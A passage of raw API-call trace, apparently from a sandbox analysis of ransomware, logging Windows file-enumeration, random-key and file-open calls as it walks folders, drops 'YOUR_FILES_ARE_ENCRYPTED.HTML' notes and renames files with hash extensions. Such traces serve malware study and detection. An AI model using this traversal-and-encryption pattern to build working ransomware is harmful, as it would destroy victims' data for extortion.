(HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.998] GetProcessHeap () returned 0x600000 [0109.998] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.998] GetProcessHeap () returned 0x600000 [0109.998] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.999] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe06db82a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0109.999] StrStrIW (lpFirst="Downloader", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.999] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 51 [0109.999] GetProcessHeap () returned 0x600000 [0109.999] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.000] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0110.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*" [0110.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae837202, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.000] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae837202, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.000] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x637d2204, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0110.000] StrStrIW (lpFirst="qmgr0.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.000] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 61 [0110.000] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0110.000] lstrlenW (lpString=".dat") returned 4 [0110.000] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0110.000] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.001] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06db82a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe06db82a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x637d837e, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0110.001] StrStrIW (lpFirst="qmgr1.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.001] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 61 [0110.001] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0110.001] lstrlenW (lpString=".dat") returned 4 [0110.001] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0110.001] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.001] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae837202, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae837202, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae83bf46, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.001] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae837202, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae837202, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae83bf46, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.001] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.002] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0110.002] GetProcessHeap () returned 0x600000 [0110.002] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.002] GetProcessHeap () returned 0x600000 [0110.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.002] GetProcessHeap () returned 0x600000 [0110.002] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.003] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae842124, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae842124, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae8473c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.003] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae842124, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae842124, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae8473c4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.003] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.003] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0110.003] GetProcessHeap () returned 0x600000 [0110.003] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.003] GetProcessHeap () returned 0x600000 [0110.003] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.003] GetProcessHeap () returned 0x600000 [0110.003] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.004] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Office", cAlternateFileName="")) returned 1 [0110.005] StrStrIW (lpFirst="Office", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.005] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office") returned 39 [0110.005] GetProcessHeap () returned 0x600000 [0110.005] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.006] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office" [0110.006] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*" [0110.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae8531fe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.006] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae8531fe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.006] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0110.006] StrStrIW (lpFirst="ClickToRunPackageLocker", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.006] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\ClickToRunPackageLocker") returned 63 [0110.006] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0110.006] lstrlenW (lpString="") returned 0 [0110.006] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0110.006] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae8531fe, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae8531fe, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae85a795, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.006] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae8531fe, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae8531fe, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae85a795, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.006] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.007] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0110.007] GetProcessHeap () returned 0x600000 [0110.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.007] GetProcessHeap () returned 0x600000 [0110.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.007] GetProcessHeap () returned 0x600000 [0110.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.008] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Provisioning", cAlternateFileName="PROVIS~1")) returned 1 [0110.008] StrStrIW (lpFirst="Provisioning", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.008] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning") returned 45 [0110.008] GetProcessHeap () returned 0x600000 [0110.008] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.009] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning" [0110.009] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\*" [0110.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaefbf3c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.010] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaefbf3c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.010] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11be8600, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11be8600, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11be8600, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6815, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="countrytable.xml", cAlternateFileName="")) returned 1 [0110.010] StrStrIW (lpFirst="countrytable.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.010] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml") returned 62 [0110.010] PathFindExtensionW (pszPath="countrytable.xml") returned=".xml" [0110.010] lstrlenW (lpString=".xml") returned 4 [0110.010] PathFindExtensionW (pszPath="countrytable.xml") returned=".xml" [0110.010] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.010] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefbe058, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefbe058, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefc2fb2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.010] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaea81845, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaea81845, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", cAlternateFileName="{18DCF~1")) returned 1 [0110.010] StrStrIW (lpFirst="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.010] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned 84 [0110.010] GetProcessHeap () returned 0x600000 [0110.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.011] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" [0110.011] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*" [0110.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaea81845, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb97d79, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.011] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaea81845, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb97d79, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.011] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f6b62d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f6b62d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaea866ee, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xe90, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756", cAlternateFileName="CUSTOM~1.E94")) returned 1 [0110.011] StrStrIW (lpFirst="customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.012] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756") returned 168 [0110.012] PathFindExtensionW 